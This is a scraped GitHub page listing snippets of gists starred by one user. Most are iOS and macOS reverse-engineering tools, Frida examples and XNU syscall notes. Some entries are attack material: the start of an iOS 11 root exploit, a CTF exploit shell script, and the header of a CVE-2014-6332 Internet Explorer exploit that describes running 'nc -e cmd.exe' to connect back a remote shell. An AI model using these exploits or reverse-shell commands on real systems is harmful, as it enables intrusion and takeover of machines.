Skip to content

Instantly share code, notes, and snippets.

View ChiChou's full-sized avatar

codecolorist ChiChou

1.4k followers · 324 following
View GitHub Profile
@Siguza
Siguza / dsc_syms.c
Last active February 20, 2022 02:19
dyld_shared_cache symbols to r2 flags
// Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c
@cheesecakeufo
cheesecakeufo / gist:d11e61afa7a0d0a9f2b5a1e42ee505d8
Created December 12, 2017 01:30
get uid: 0 - iOS 11
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
* Purpose: iterates over the procs and finds our proc
*/
uint64_t get_our_proc() {
@overtrue
overtrue / KillWeiboDogs.js
Last active June 3, 2020 03:15
KillWeiboDogs
// 1. 使用 chrome 打开 weibo.com (确保你登录了微博)
// 2. 打开调试窗口,在 console 中贴下面的代码后回车
// 数据来自:https://github.com/yu961549745/WeiboBlackList
let dogs = [ 5471246591, 5209943797, 1709070650, 1887921907, 1824515351, 6031549751, 3477430640, 5303365027, 2397004535, 5014141958, 2357033797, 2253196910, 1282371413, 5433169859, 5577097996, 2477460747, 5791757379, 3973075219, 5480191060, 5064046310, 1794010902, 5241254653, 1775613335, 1749775825, 2898929101, 1766122373, 5330205046, 5836217079, 2143736030, 5088125436, 2122838230, 2379528185, 5768433920, 1588830357, 2734746975, 1702267517, 3305446403, 1922854483, 2240459775, 1713064495, 3141318761, 3049734521, 1297708027, 1670201221, 1113091931, 2682353630, 1889031894, 5736617825, 5573535479, 1787098822, 5474940961, 2647495542, 1978558182, 5675487085, 2066669447, 1410124131, 3318338712, 5117947348, 5984813988, 1935760780, 2106405744, 1658278557, 3123751063, 2418980745, 5612086708, 2822792580, 2728966594, 5651704821, 3174983660, 2884830430, 1409910532, 5289026864, 5460203843, 30409
@ThatsJustCheesy
ThatsJustCheesy / HIServicesPrivate_v1.h
Created August 21, 2017 00:39
Private interfaces in HIServices.framework (subframework of ApplicationServices.framework) that message the Dock to set preferences on-the-fly.
// HIServicesPrivate.h v1
// By ThatsJustCheesy
// TO USE THESE INTERFACES, you MUST link against ApplicationServices.framework.
#pragma once
#ifdef __cplusplus
extern "C" {
#endif
@oleavr
oleavr / 00-README.md
Last active April 26, 2024 11:18
Frida devkit examples

frida-gum-example.c

$ clang -Wall -Os -pipe -g3 frida-gum-example.c -o frida-gum-example -L. -lfrida-gum -lresolv -Wl,-dead_strip -Wl,-no_compact_unwind
$ ./frida-gum-example
[*] open("/etc/hosts")
[*] close(3)
[*] open("/etc/fstab")
[*] close(-1)
[*] listener got 4 calls

[*] listener still has 4 calls

@yrp604
yrp604 / xnu-syscall-life-amd64.md
Last active October 2, 2023 15:59
The life of an XNU unix syscall on amd64

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |
@C0deH4cker
C0deH4cker / syms.c
Created March 20, 2016 03:21
Prints out the name, type, and value of every symbol in a Mach-O file, similar to nm.
//
// main.c
// macho-syms
//
// Created by C0deH4cker on 3/19/16.
// Copyright © 2016 C0deH4cker. All rights reserved.
//
#include <stdio.h>
#include <stdlib.h>
@stephenR
stephenR / doit.sh
Last active January 5, 2016 22:34
32c3 vault exploit
#!/bin/sh
echo 'sleep 600' | /tmp/unshare &
sleep 1;
echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root
@refi64
refi64 / fuzzyfinder.py
Last active August 29, 2015 14:23
def fuzzyfinder(p, l):
return map(lambda t: t[0], sorted(filter(lambda t: all(map(lambda x: x != -1, t[1])), map(lambda s: (s,map(s.find, p)), l)), key=lambda t: t[1]))
@worawit
worawit / cve-2014-6332_exploit.html
Last active March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)